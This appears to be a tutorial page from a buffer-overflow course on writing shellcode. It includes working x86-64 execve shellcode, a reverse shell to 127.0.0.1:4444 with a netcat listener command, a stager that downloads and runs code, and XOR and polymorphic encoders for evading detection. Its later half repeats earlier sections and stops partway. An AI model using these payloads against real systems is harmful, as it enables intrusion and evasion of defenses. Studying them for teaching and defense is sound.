Buffer Overflow Attacks - Learning Module

Loading content...

0/227

Code Injection

The Art of Weaponized Bytes

In 1996, the first public examples of "shellcode" emerged—compact, self-contained machine code designed to spawn a command shell when executed. The name stuck: whether the payload downloads a file, establishes a network connection, or modifies system configuration, we still call it shellcode.

Code injection represents the culmination of a buffer overflow attack. Once an attacker controls the instruction pointer, they must provide something meaningful for the CPU to execute. Writing effective shellcode is a discipline that combines low-level assembly programming, deep understanding of OS internals, and creative problem-solving to work around constraints.

This page transforms you from understanding exploitation conceptually to understanding the payload itself—the bytes that make exploitation worthwhile.

What You Will Learn

By the end of this page, you will understand: how to write position-independent shellcode, system call mechanics for spawning shells and making network connections, encoding techniques to bypass character filters, polymorphic and metamorphic shellcode concepts, and the practical limitations of modern shellcode deployment.

Shellcode Fundamentals

Shellcode is machine code (raw CPU instructions) designed to execute arbitrary operations when injected into a running process. Unlike compiled programs, shellcode has unique constraints:

Position Independence: Shellcode doesn't know where in memory it will land. It cannot use absolute addresses for its own data or code. All references must be relative or computed at runtime.

Self-Containment: Shellcode typically cannot rely on external libraries being loaded at known addresses. It must make direct system calls or use carefully-located library functions.

Size Minimization: Smaller buffer = tighter space constraints. Every byte counts when you're working within a 64-byte or 128-byte overflow window.

Character Restrictions: Many vulnerabilities involve string functions that filter certain bytes. Shellcode must avoid or encode those bytes.

Common Shellcode Categories

•Local Shellcode — Executes on the same machine. Spawns a shell, reads files, or modifies system state. Used for local privilege escalation or post-exploitation.
•Bind Shell — Opens a listening port on the target machine. Attacker connects inbound. Problem: firewalls often block unexpected inbound connections.
•Reverse Shell — Initiates an outbound connection to the attacker's machine. Bypasses ingress firewall rules. Most common in real-world exploitation.
•Egghunter — Tiny first-stage shellcode that searches memory for a larger second-stage payload marked with a unique signature ('egg'). Used when exploit buffer is too small for full payload.
•Staged Payload — First stage is minimal (connect back, receive data); second stage is the full payload downloaded over the network. Metasploit's meterpreter uses this model.
•Fileless Execution — Loads code directly into memory without touching disk. Evades file-based antivirus detection.

Why 'Shell' Code?

The term 'shellcode' originated because early payloads primarily spawned interactive shells (/bin/sh on Unix). Today, shellcode might exfiltrate data, establish persistent backdoors, mine cryptocurrency, or deliver ransomware—but the name persists as a historical artifact of the exploit development community.

Writing Position-Independent Code

Position-independent code (PIC) executes correctly regardless of where it's loaded in memory. This is essential for shellcode because we can't predict the exact address where our payload will land.

The Problem: Shellcode often needs to reference strings (like /bin/sh) or other data. Normal code uses absolute addresses, but we don't know our address.

The Solution: Multiple techniques exist to create position-independent references:

PIC Techniques

•JMP-CALL-POP Technique — Jump forward over data, call backward to get address pushed on stack, pop that address into a register. Classic and reliable.
•Stack-Based String Building — Push string bytes onto stack, then reference via stack pointer. No absolute addresses needed.
•RIP-Relative Addressing (x86-64) — On 64-bit, use lea rax, [rip+offset] to get addresses relative to current instruction. Very clean on modern architectures.
•GetPC Techniques — Various tricks to get the current program counter (instruction pointer) value into a register, enabling relative calculations.

jmp_call_pop.asm

Assembly (x86-64)

;; JMP-CALL-POP Technique for position-independent string reference
;; This is the classic technique, works on all x86/x64
 
section .text
global _start
 
_start:
    jmp short get_string_addr    ; Jump forward over data access code
 
execute_shell:
    pop rdi                       ; Pop string address from stack
                                  ; (CALL pushed address of string)
    
    xor rsi, rsi                  ; argv = NULL
    xor rdx, rdx                  ; envp = NULL
    
    push 59                       ; syscall number for execve
    pop rax                       ; Avoid null bytes in mov rax, 59
    
    syscall                       ; Execute execve("/bin/sh", NULL, NULL)
 
get_string_addr:
    call execute_shell            ; CALL pushes address of next byte (the string)
    db "/bin/sh", 0               ; String data immediately after CALL
 
;; Assembled, this becomes approximately:
;; eb 0e                    jmp short get_string_addr (+14 bytes)
;; 5f                       pop rdi
;; 48 31 f6                 xor rsi, rsi
;; 48 31 d2                 xor rdx, rdx  
;; 6a 3b                    push 59
;; 58                       pop rax
;; 0f 05                    syscall
;; e8 ed ff ff ff           call execute_shell (-19 bytes)
;; 2f 62 69 6e 2f 73 68 00  "/bin/sh\0"

stack_string.asm

Assembly (x86-64)

;; Stack-based string building (no JMP-CALL needed)
;; Push string onto stack, reference via RSP
 
section .text
global _start
 
_start:
    xor rsi, rsi                  ; RSI = 0 (also serves as null terminator)
    push rsi                      ; Push null terminator onto stack
    
    ; Push "/bin//sh" (8 bytes, padded to avoid partial push)
    ; In little-endian: 0x68732f2f6e69622f
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh" 
    push rdi                      ; Push string onto stack
    
    mov rdi, rsp                  ; RDI = pointer to string on stack
    
    ; RSI already 0 (argv = NULL)
    xor rdx, rdx                  ; envp = NULL
    
    push 59
    pop rax                       ; Syscall number (execve = 59)
    
    syscall
 
;; Key insight: The string "/bin//sh" is built on the stack
;; Double slash is ignored by the shell, but gives us exactly 8 bytes
;; No null bytes except the terminator pushed as 0

Why Double Slashes?

Using '/bin//sh' instead of '/bin/sh' gives exactly 8 bytes—a convenient size for 64-bit register operations. Unix systems treat consecutive slashes as a single slash, so '/bin//sh' is equivalent to '/bin/sh'. This trick is ubiquitous in shellcode development.

System Call Mechanics

Shellcode operates in user space but needs kernel services—spawning processes, opening network connections, reading files. On Linux, this is accomplished through system calls (syscalls).

System Call Invocation on Linux x86-64:

Place syscall number in RAX
Place arguments in RDI, RSI, RDX, R10, R8, R9 (in order)
Execute the syscall instruction
Return value appears in RAX

Essential System Calls for Shellcode
Syscall	Number (x64)	Arguments	Purpose
`execve`	59 (0x3b)	rdi=path, rsi=argv, rdx=envp	Execute a program (spawn shell)
`read`	0	rdi=fd, rsi=buf, rdx=count	Read from file descriptor
`write`	1	rdi=fd, rsi=buf, rdx=count	Write to file descriptor
`open`	2	rdi=path, rsi=flags, rdx=mode	Open a file
`socket`	41	rdi=domain, rsi=type, rdx=proto	Create network socket
`connect`	42	rdi=sockfd, rsi=addr, rdx=len	Connect to remote host
`dup2`	33	rdi=oldfd, rsi=newfd	Duplicate file descriptor
`mprotect`	10	rdi=addr, rsi=len, rdx=prot	Change memory permissions
`fork`	57	(none)	Create child process
`exit`	60	rdi=status	Terminate process cleanly

reverse_shell.asm

Assembly (x86-64)

;; Reverse Shell Shellcode for Linux x86-64
;; Connects back to 127.0.0.1:4444 and spawns /bin/sh
;; Attacker runs: nc -lvp 4444
 
section .text
global _start
 
_start:
    ;; Create socket: socket(AF_INET=2, SOCK_STREAM=1, 0)
    xor rdi, rdi
    push rdi                      ; Push 0 for socket()
    pop rsi                       ; RSI = 0
    inc rsi                       ; RSI = 1 (SOCK_STREAM)
    push 2
    pop rdi                       ; RDI = 2 (AF_INET)
    xor rdx, rdx                  ; RDX = 0 (protocol)
    push 41
    pop rax                       ; syscall 41 = socket
    syscall
    
    mov r12, rax                  ; Save socket fd in R12
    
    ;; Build sockaddr_in structure on stack
    ;; struct sockaddr_in { sin_family=2, sin_port=0x5c11 (4444), sin_addr=127.0.0.1 }
    xor rax, rax
    push rax                      ; sin_zero padding
    
    mov eax, 0x0100007f           ; 127.0.0.1 in network byte order
    push rax                      ; sin_addr
    
    push word 0x5c11              ; port 4444 in network byte order
    push word 2                   ; AF_INET
    
    mov rsi, rsp                  ; RSI = pointer to sockaddr_in
    
    ;; Connect: connect(sockfd, &sockaddr, 16)
    mov rdi, r12                  ; Socket fd
    push 16
    pop rdx                       ; Address length
    push 42
    pop rax                       ; syscall 42 = connect
    syscall
    
    ;; Duplicate socket to stdin/stdout/stderr
    ;; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    mov rdi, r12                  ; Socket fd
    xor rsi, rsi                  ; Start with fd 0 (stdin)
    
dup_loop:
    push 33
    pop rax                       ; syscall 33 = dup2
    syscall
    inc rsi
    cmp rsi, 3
    jne dup_loop
    
    ;; Execute shell: execve("/bin/sh", NULL, NULL)
    xor rsi, rsi
    push rsi                      ; NULL terminator
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh"
    push rdi
    mov rdi, rsp                  ; RDI = pointer to string
    xor rdx, rdx                  ; envp = NULL
    push 59
    pop rax                       ; syscall 59 = execve
    syscall

32-bit vs 64-bit Syscalls

On 32-bit Linux, syscalls use int 0x80 with arguments in EAX, EBX, ECX, EDX, ESI, EDI. On 64-bit, syscall instruction and different registers are used. Syscall numbers also differ between 32-bit and 64-bit. Always use the correct syscall table for your target architecture.

Avoiding Bad Characters

Bad characters are bytes that the vulnerability context corrupts, terminates, or filters. Common bad characters include:

\x00 (NULL) — Terminates strings in C
\x0a (newline) — Terminates input for fgets, line-based protocols
\x0d (carriage return) — Terminates input in some contexts
\x20 (space) — May be treated as delimiter
\x09 (tab) — May be treated as whitespace
\xff — Sometimes filtered by UTF-8 validation

The specific bad characters depend on the vulnerability and input handling.

Finding Bad Characters

•Send full byte range (0x00-0xff) as test payload
•Compare received/stored data with original
•Missing or altered bytes are bad chars
•Tools: mona.py, BadChars generator

Avoidance Strategies

•XOR encoding with single-byte key
•Multi-byte XOR for stronger encoding
•Alphanumeric shellcode (A-Z, a-z, 0-9 only)
•Unicode-safe encoding for wide-char contexts

xor_encoder.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/env python3
"""
XOR Encoder for Shellcode
Encodes shellcode to avoid specified bad characters
Prepends a decoder stub that runs first and decodes the payload
"""
 
def find_xor_key(shellcode: bytes, bad_chars: bytes) -> int:
    """Find an XOR key that, when applied, produces no bad characters."""
    for key in range(1, 256):  # Skip 0 as XOR with 0 is no-op
        encoded = bytes([b ^ key for b in shellcode])
        if not any(c in bad_chars for c in encoded):
            # Also verify the key itself isn't a bad char (appears in decoder)
            if key not in bad_chars:
                return key
    raise ValueError("No valid XOR key found - try multi-byte encoding")
 
def xor_encode(shellcode: bytes, key: int) -> bytes:
    """XOR encode shellcode with given key."""
    return bytes([b ^ key for b in shellcode])
 
def generate_decoder_stub(key: int, length: int) -> bytes:
    """
    Generate x86-64 decoder stub.
    This stub XOR-decodes the following payload in-place.
    """
    # Decoder stub that decodes payload after itself
    # Uses JMP-CALL-POP to get address of encoded payload
    decoder = bytes([
        0xeb, 0x0d,                    # jmp short get_payload_addr
        # decode_loop:
        0x5e,                          # pop rsi (address of encoded shellcode)
        0x31, 0xc9,                    # xor ecx, ecx
        0xb1, length,                  # mov cl, length
        # decode:
        0x80, 0x36, key,               # xor byte [rsi], key
        0x46,                          # inc rsi (should be 0x48, 0xff, 0xc6 for 64-bit)
        0xe2, 0xfa,                    # loop decode (-6)
        0xeb, 0x05,                    # jmp short shellcode
        # get_payload_addr:
        0xe8, 0xee, 0xff, 0xff, 0xff,  # call decode_loop
        # Encoded shellcode follows here
    ])
    return decoder
 
# Example usage
original_shellcode = bytes([
    0x48, 0x31, 0xf6,              # xor rsi, rsi
    0x48, 0xbf, 0x2f, 0x62, 0x69,  # mov rdi, '/bin//sh'
    0x6e, 0x2f, 0x2f, 0x73, 0x68,
    0x57,                          # push rdi
    0x48, 0x89, 0xe7,              # mov rdi, rsp
    0x48, 0x31, 0xd2,              # xor rdx, rdx
    0xb0, 0x3b,                    # mov al, 59
    0x0f, 0x05                     # syscall
])
 
bad_chars = b"\x00\x0a\x0d"
 
print(f"Original shellcode: {len(original_shellcode)} bytes")
print(f"Bad characters to avoid: {bad_chars.hex()}")
 
# Find suitable key
key = find_xor_key(original_shellcode, bad_chars)
print(f"XOR key found: 0x{key:02x}")
 
# Encode
encoded = xor_encode(original_shellcode, key)
print(f"Encoded shellcode: {encoded.hex()}")
 
# Verify no bad chars
for c in encoded:
    if bytes([c]) in bad_chars:
        print(f"ERROR: Bad char 0x{c:02x} in encoded shellcode!")
        break
else:
    print("✓ No bad characters in encoded payload")
 
# Generate complete payload with decoder
decoder = generate_decoder_stub(key, len(original_shellcode))
final_payload = decoder + encoded
print(f"Final payload: {len(final_payload)} bytes")
print(f"Payload hex: {final_payload.hex()}")

Self-Decoding Payloads

XOR-encoded shellcode works by prepending a small decoder stub. When execution reaches the payload, the decoder runs first, XORing each byte with the key to reveal the original shellcode, then jumps to execute it. The decoder itself must be null-free and avoid bad characters—this constrains decoder design.

Alphanumeric and Polymorphic Shellcode

Some vulnerability contexts are extremely restrictive, allowing only alphanumeric characters (A-Z, a-z, 0-9) or even narrower byte ranges. Additionally, signature-based detection systems may block known shellcode patterns. Advanced techniques address both challenges.

Alphanumeric Shellcode

•Constraint: Only bytes 0x30-0x39 (0-9), 0x41-0x5A (A-Z), 0x61-0x7A (a-z) allowed
•Challenge: Most essential instructions (syscall, jumps) use non-alphanumeric bytes
•Solution: Use the limited valid instructions to build a decoder that can generate arbitrary bytes
•Techniques: XOR with alphanumeric values, push/pop combinations, arithmetic operations
•Tools: alpha2, msfvenom's alpha_mixed encoder, ALPHA3

alphanumeric_concept.asm

Assembly Concepts

;; Alphanumeric-compatible instructions (x86)
;; These opcodes fall within A-Z, a-z, 0-9 ASCII ranges
 
;; Valid alphanumeric instructions include:
;; push/pop certain registers: P (0x50) = push eax, X (0x58) = pop eax
;; inc/dec: I = dec ecx (0x49), A = inc ecx (0x41), etc.
;; xor reg,imm: 5 = xor eax,imm32 (0x35)
;; and reg,imm: % = and eax,imm32 (0x25)
 
;; Example: Building arbitrary value in EAX using only alphanumeric ops
;; Goal: Put 0x99c0cd80 (int 0x80 + nop pattern) in EAX
;; Approach: Use AND with two values that AND to 0, then XOR in target
 
push eax                    ; P (0x50) - valid
and eax, 0x554e4d4a        ; %JMN\U (valid alphanumeric)
and eax, 0x2a313235        ; %125*1 (valid, with AND produces 0x00000000)
xor eax, 0x39443143        ; 5C1D9 (valid alphanumeric)
;; Sequential XORs can build any 32-bit value
 
;; After building decoder in alphanumeric ops, decode and run real shellcode
 
;; Tools like alpha2 automatically generate these sequences
;; Example: msfvenom -p linux/x86/shell_reverse_tcp ... -e x86/alpha_mixed

Polymorphic Shellcode

Polymorphic shellcode changes its appearance on each generation while maintaining identical functionality. This defeats signature-based detection that looks for specific byte patterns.

How Polymorphism Works:

Variable encoding keys: Each instance uses a different XOR key, completely changing all encoded bytes
Decoder variation: The decoder stub itself uses different but equivalent instructions
NOP substitution: Different single-byte NOPs or multi-byte NOP equivalents
Register shuffling: Use different registers for the same operations
Junk insertion: Add non-functional instructions that change signature but don't affect execution

polymorphic_generator.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/env python3
"""
Simple Polymorphic Shellcode Generator
Generates unique encoded variants of base shellcode
"""
 
import random
 
def generate_polymorphic_variant(shellcode: bytes) -> bytes:
    """Generate a unique polymorphic variant of shellcode."""
    
    # Random XOR key (avoid 0x00)
    key = random.randint(1, 255)
    
    # Encode shellcode
    encoded = bytes([b ^ key for b in shellcode])
    
    # Generate decoder with random variations
    decoder = generate_varied_decoder(key, len(shellcode))
    
    # Add random NOP sled variation
    nop_variants = [
        b"\x90",              # NOP
        b"\x40\x48",         # inc eax; dec eax (null operation pair)
        b"\x87\xc0",         # xchg eax, eax
        b"\x86\xc9",         # xchg cl, cl  
    ]
    
    nop_sled = b""
    for _ in range(random.randint(8, 32)):
        nop_sled += random.choice(nop_variants)
    
    return nop_sled + decoder + encoded
 
def generate_varied_decoder(key: int, length: int) -> bytes:
    """Generate decoder with random instruction choices."""
    
    # Choose random register for loop counter (CL or BL)
    use_cl = random.choice([True, False])
    
    if use_cl:
        # Version using CL
        set_counter = bytes([0x31, 0xc9, 0xb1, length])  # xor ecx,ecx; mov cl,len
        loop_inst = bytes([0xe2])                        # loop
    else:
        # Version using BL (requires different loop logic)
        set_counter = bytes([0x31, 0xdb, 0xb3, length])  # xor ebx,ebx; mov bl,len
        loop_inst = bytes([0xfe, 0xcb, 0x75])            # dec bl; jnz
    
    # Random junk instructions to insert (no-ops that change signature)
    junk_options = [
        b"",                   # No junk
        b"\x50\x58",         # push eax; pop eax
        b"\x51\x59",         # push ecx; pop ecx
        b"\x90",              # nop
    ]
    junk = random.choice(junk_options)
    
    # Build decoder (simplified)
    decoder = bytes([
        0xeb, 0x0d + len(junk),  # jmp to get_addr
    ]) + junk + bytes([
        0x5e,                    # pop rsi
    ]) + set_counter + bytes([
        0x80, 0x36, key,         # xor byte [rsi], key
        0x46,                    # inc rsi
    ]) + loop_inst + bytes([
        0xfa,                    # -6 offset
        0xeb, 0x05,              # jmp to shellcode
        0xe8,                    # call
    ]) + bytes([
        (0x100 - (0x12 + len(junk))) & 0xff, 0xff, 0xff, 0xff
    ])
    
    return decoder
 
# Generate multiple unique variants of same shellcode
base_shellcode = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68,
    0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50,
    0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80
])
 
print("Generating 3 polymorphic variants:")
for i in range(3):
    variant = generate_polymorphic_variant(base_shellcode)
    print(f"\nVariant {i+1}: {len(variant)} bytes")
    print(f"  First 20 bytes: {variant[:20].hex()}")
    print(f"  Hash: {hash(variant) & 0xffffffff:08x}")

Metamorphic Shellcode

Beyond polymorphism lies metamorphic code, which actually rewrites its own logic (not just encoding) to generate functionally equivalent but structurally different variants. True metamorphic engines are complex but can evade behavioral analysis by varying the actual instruction sequences, not just their byte representations.

Staged and Modular Payloads

Real-world exploitation often faces severe size constraints. A buffer might only hold 80 bytes—far too small for sophisticated payloads like Meterpreter. Staged payloads solve this by splitting the attack into multiple phases.

Converting Mermaid diagram...

Staged Payload Architecture

•Stager (Stage 1) — Minimal code that establishes communication and receives the main payload. Examples: reverse_tcp stager (~30 bytes), bind_tcp stager (~50 bytes), find_sock stager (~35 bytes).
•Payload (Stage 2) — The full-featured payload delivered after stager connects. Can be arbitrarily large since it's transmitted over network/socket.
•Egghunter Variant — When second stage is already in memory (e.g., larger buffer elsewhere), stager searches for signature ('egg') and jumps to it.

stager.asm

Assembly (x86-64)

;; Minimal TCP Stager (reverse connect, receive, execute)
;; Fits in approximately 75 bytes
;; Connects to attacker, receives arbitrary code, executes it
 
section .text
global _start
 
_start:
    ;; socket(AF_INET=2, SOCK_STREAM=1, 0)
    push 41                       ; syscall: socket
    pop rax
    push 2
    pop rdi                       ; AF_INET
    push 1
    pop rsi                       ; SOCK_STREAM
    xor rdx, rdx                  ; 0
    syscall
    mov r12, rax                  ; Save socket fd
 
    ;; Build sockaddr_in and connect
    push rdx                      ; 0 padding
    mov eax, 0x0100007f           ; 127.0.0.1
    push rax
    push word 0x5c11              ; Port 4444
    push word 2                   ; AF_INET
    
    push 42                       ; syscall: connect
    pop rax
    mov rdi, r12                  ; socket fd
    mov rsi, rsp                  ; sockaddr pointer
    push 16
    pop rdx                       ; addrlen
    syscall
 
    ;; mmap executable memory for payload
    push 9                        ; syscall: mmap
    pop rax
    xor rdi, rdi                  ; addr = NULL
    push 4096
    pop rsi                       ; length
    push 7                        ; PROT_READ|WRITE|EXEC
    pop rdx
    push 0x22                     ; MAP_ANONYMOUS|PRIVATE
    pop r10
    push 0xffffffffffffffff
    pop r8                        ; fd = -1
    xor r9, r9                    ; offset = 0
    syscall
    mov r13, rax                  ; Save mmap address
 
    ;; read(socket, mmap_addr, 4096)
    xor rax, rax                  ; syscall: read
    mov rdi, r12                  ; socket fd
    mov rsi, r13                  ; buffer (mmap)
    push 4096
    pop rdx                       ; count
    syscall
 
    ;; Jump to received payload
    jmp r13

Egghunter Technique

When you can inject a large payload into memory but only control a small buffer for the initial exploit, an egghunter bridges the gap:

Inject large payload into some reachable memory (heap, environment, etc.)
Prefix payload with unique 8-byte signature (the "egg"): e.g., w00tw00t
Small egghunter shellcode in exploited buffer searches memory for egg
When found, jump to address immediately after egg

Egghunters must handle:

Invalid memory pages (use syscalls to safely probe)
Searching in correct direction
Finding the actual payload, not the egg reference in the egghunter itself (hence doubled egg signature)

Metasploit Framework

Metasploit's payload system exemplifies staged architecture. Payloads like linux/x64/meterpreter/reverse_tcp are staged (small stager + full Meterpreter), while linux/x64/meterpreter_reverse_tcp is stageless (single large payload). Choose based on buffer size and operational requirements.

Modern Shellcode Challenges

Modern operating systems and hardware have deployed multiple layers of defense that complicate shellcode execution. Understanding these challenges is essential for both offensive research and defensive awareness.

Defenses Against Code Injection
Defense	Mechanism	Impact on Shellcode	Bypass Technique
DEP/NX	Data pages marked non-executable	Injected shellcode cannot run	ROP chains, ret2libc, calling mprotect
ASLR	Randomize library/stack addresses	Cannot predict where to return	Info leak, partial overwrite, brute force
Stack Canaries	Secret value before return address	Overflow detected before RET	Info leak canary, format string
CFI	Control flow integrity checks	Invalid jump targets blocked	CFI-compliant gadgets, fine-grained attacks
Sandboxing	Restrict available syscalls	Shellcode functionality limited	Use allowed syscalls, sandbox escape

Adaptation Strategies

•ROP for DEP Bypass — Instead of executing injected code, chain existing code fragments ('gadgets') that end in RET. Turing-complete computation possible. Covered in next page.
•Information Leaks for ASLR Bypass — Use separate vulnerability to read memory, revealing library addresses. Single leak can dereference entire attacking chain.
•Canary Brute Force — On fork-based servers, child crashes don't affect parent. Byte-by-byte canary revelation possible.
•JIT Spray — Inject shellcode disguised as JIT-compiled code. JavaScript engines (pre-mitigations) would mark it executable.
•Data-Only Attacks — Corrupt application data without changing control flow. Avoid DEP and CFI but achieve desired outcome.

The Arms Race Continues

Each defense spawns bypass research; each bypass prompts stronger defenses. Modern exploitation often requires chaining multiple vulnerabilities: one for info leak, one for control flow, one for privilege escalation. Single-bug exploitation is increasingly rare against hardened targets.

Summary: Mastering Code Injection

We've explored the art and science of shellcode development—from fundamental position-independent code to advanced polymorphic and staged payloads. Let's consolidate the key insights.

Key Takeaways

•Shellcode must be position-independent — JMP-CALL-POP, stack-based strings, and RIP-relative addressing enable code that runs anywhere in memory.
•System calls are the shellcode's interface to the kernel — Understanding syscall mechanics enables arbitrary actions: spawning shells, network connections, file operations.
•Bad characters require encoding — XOR encoding with decoder stubs bypasses byte filters; alphanumeric encoders handle the most restrictive contexts.
•Polymorphism defeats signatures — Varying encoding keys, instruction selection, and junk insertion makes each payload unique.
•Staged payloads overcome size limits — Tiny stagers fetch full payloads over network; egghunters locate large payloads in memory.
•Modern defenses require adaptation — DEP, ASLR, and CFI don't eliminate exploitation but shift techniques toward ROP, info leaks, and chains.

What's Next: Return-Oriented Programming

The next page explores Return-Oriented Programming (ROP)—the dominant technique for exploiting systems with DEP enabled. When we can't execute injected code, we chain existing code fragments to achieve arbitrary computation without ever executing attacker-controlled bytes directly.

Page Complete

You now understand the fundamentals of shellcode development: position independence, system call mechanics, encoding techniques, and the constraints imposed by modern defenses. This knowledge is essential for understanding both vulnerability exploitation and the design of effective mitigations.

Code Injection

The Art of Weaponized Bytes

This page transforms you from understanding exploitation conceptually to understanding the payload itself—the bytes that make exploitation worthwhile.

What You Will Learn

Shellcode Fundamentals

Shellcode is machine code (raw CPU instructions) designed to execute arbitrary operations when injected into a running process. Unlike compiled programs, shellcode has unique constraints:

Position Independence: Shellcode doesn't know where in memory it will land. It cannot use absolute addresses for its own data or code. All references must be relative or computed at runtime.

Self-Containment: Shellcode typically cannot rely on external libraries being loaded at known addresses. It must make direct system calls or use carefully-located library functions.

Size Minimization: Smaller buffer = tighter space constraints. Every byte counts when you're working within a 64-byte or 128-byte overflow window.

Character Restrictions: Many vulnerabilities involve string functions that filter certain bytes. Shellcode must avoid or encode those bytes.

Common Shellcode Categories

•Local Shellcode — Executes on the same machine. Spawns a shell, reads files, or modifies system state. Used for local privilege escalation or post-exploitation.
•Bind Shell — Opens a listening port on the target machine. Attacker connects inbound. Problem: firewalls often block unexpected inbound connections.
•Reverse Shell — Initiates an outbound connection to the attacker's machine. Bypasses ingress firewall rules. Most common in real-world exploitation.
•Egghunter — Tiny first-stage shellcode that searches memory for a larger second-stage payload marked with a unique signature ('egg'). Used when exploit buffer is too small for full payload.
•Staged Payload — First stage is minimal (connect back, receive data); second stage is the full payload downloaded over the network. Metasploit's meterpreter uses this model.
•Fileless Execution — Loads code directly into memory without touching disk. Evades file-based antivirus detection.

Why 'Shell' Code?

Writing Position-Independent Code

Position-independent code (PIC) executes correctly regardless of where it's loaded in memory. This is essential for shellcode because we can't predict the exact address where our payload will land.

The Problem: Shellcode often needs to reference strings (like /bin/sh) or other data. Normal code uses absolute addresses, but we don't know our address.

The Solution: Multiple techniques exist to create position-independent references:

PIC Techniques

•JMP-CALL-POP Technique — Jump forward over data, call backward to get address pushed on stack, pop that address into a register. Classic and reliable.
•Stack-Based String Building — Push string bytes onto stack, then reference via stack pointer. No absolute addresses needed.
•RIP-Relative Addressing (x86-64) — On 64-bit, use lea rax, [rip+offset] to get addresses relative to current instruction. Very clean on modern architectures.
•GetPC Techniques — Various tricks to get the current program counter (instruction pointer) value into a register, enabling relative calculations.

jmp_call_pop.asm

Assembly (x86-64)

;; JMP-CALL-POP Technique for position-independent string reference
;; This is the classic technique, works on all x86/x64
 
section .text
global _start
 
_start:
    jmp short get_string_addr    ; Jump forward over data access code
 
execute_shell:
    pop rdi                       ; Pop string address from stack
                                  ; (CALL pushed address of string)
    
    xor rsi, rsi                  ; argv = NULL
    xor rdx, rdx                  ; envp = NULL
    
    push 59                       ; syscall number for execve
    pop rax                       ; Avoid null bytes in mov rax, 59
    
    syscall                       ; Execute execve("/bin/sh", NULL, NULL)
 
get_string_addr:
    call execute_shell            ; CALL pushes address of next byte (the string)
    db "/bin/sh", 0               ; String data immediately after CALL
 
;; Assembled, this becomes approximately:
;; eb 0e                    jmp short get_string_addr (+14 bytes)
;; 5f                       pop rdi
;; 48 31 f6                 xor rsi, rsi
;; 48 31 d2                 xor rdx, rdx  
;; 6a 3b                    push 59
;; 58                       pop rax
;; 0f 05                    syscall
;; e8 ed ff ff ff           call execute_shell (-19 bytes)
;; 2f 62 69 6e 2f 73 68 00  "/bin/sh\0"

stack_string.asm

Assembly (x86-64)

;; Stack-based string building (no JMP-CALL needed)
;; Push string onto stack, reference via RSP
 
section .text
global _start
 
_start:
    xor rsi, rsi                  ; RSI = 0 (also serves as null terminator)
    push rsi                      ; Push null terminator onto stack
    
    ; Push "/bin//sh" (8 bytes, padded to avoid partial push)
    ; In little-endian: 0x68732f2f6e69622f
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh" 
    push rdi                      ; Push string onto stack
    
    mov rdi, rsp                  ; RDI = pointer to string on stack
    
    ; RSI already 0 (argv = NULL)
    xor rdx, rdx                  ; envp = NULL
    
    push 59
    pop rax                       ; Syscall number (execve = 59)
    
    syscall
 
;; Key insight: The string "/bin//sh" is built on the stack
;; Double slash is ignored by the shell, but gives us exactly 8 bytes
;; No null bytes except the terminator pushed as 0

Why Double Slashes?

System Call Mechanics

Shellcode operates in user space but needs kernel services—spawning processes, opening network connections, reading files. On Linux, this is accomplished through system calls (syscalls).

System Call Invocation on Linux x86-64:

Place syscall number in RAX
Place arguments in RDI, RSI, RDX, R10, R8, R9 (in order)
Execute the syscall instruction
Return value appears in RAX

Essential System Calls for Shellcode
Syscall	Number (x64)	Arguments	Purpose
`execve`	59 (0x3b)	rdi=path, rsi=argv, rdx=envp	Execute a program (spawn shell)
`read`	0	rdi=fd, rsi=buf, rdx=count	Read from file descriptor
`write`	1	rdi=fd, rsi=buf, rdx=count	Write to file descriptor
`open`	2	rdi=path, rsi=flags, rdx=mode	Open a file
`socket`	41	rdi=domain, rsi=type, rdx=proto	Create network socket
`connect`	42	rdi=sockfd, rsi=addr, rdx=len	Connect to remote host
`dup2`	33	rdi=oldfd, rsi=newfd	Duplicate file descriptor
`mprotect`	10	rdi=addr, rsi=len, rdx=prot	Change memory permissions
`fork`	57	(none)	Create child process
`exit`	60	rdi=status	Terminate process cleanly

reverse_shell.asm

Assembly (x86-64)

;; Reverse Shell Shellcode for Linux x86-64
;; Connects back to 127.0.0.1:4444 and spawns /bin/sh
;; Attacker runs: nc -lvp 4444
 
section .text
global _start
 
_start:
    ;; Create socket: socket(AF_INET=2, SOCK_STREAM=1, 0)
    xor rdi, rdi
    push rdi                      ; Push 0 for socket()
    pop rsi                       ; RSI = 0
    inc rsi                       ; RSI = 1 (SOCK_STREAM)
    push 2
    pop rdi                       ; RDI = 2 (AF_INET)
    xor rdx, rdx                  ; RDX = 0 (protocol)
    push 41
    pop rax                       ; syscall 41 = socket
    syscall
    
    mov r12, rax                  ; Save socket fd in R12
    
    ;; Build sockaddr_in structure on stack
    ;; struct sockaddr_in { sin_family=2, sin_port=0x5c11 (4444), sin_addr=127.0.0.1 }
    xor rax, rax
    push rax                      ; sin_zero padding
    
    mov eax, 0x0100007f           ; 127.0.0.1 in network byte order
    push rax                      ; sin_addr
    
    push word 0x5c11              ; port 4444 in network byte order
    push word 2                   ; AF_INET
    
    mov rsi, rsp                  ; RSI = pointer to sockaddr_in
    
    ;; Connect: connect(sockfd, &sockaddr, 16)
    mov rdi, r12                  ; Socket fd
    push 16
    pop rdx                       ; Address length
    push 42
    pop rax                       ; syscall 42 = connect
    syscall
    
    ;; Duplicate socket to stdin/stdout/stderr
    ;; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    mov rdi, r12                  ; Socket fd
    xor rsi, rsi                  ; Start with fd 0 (stdin)
    
dup_loop:
    push 33
    pop rax                       ; syscall 33 = dup2
    syscall
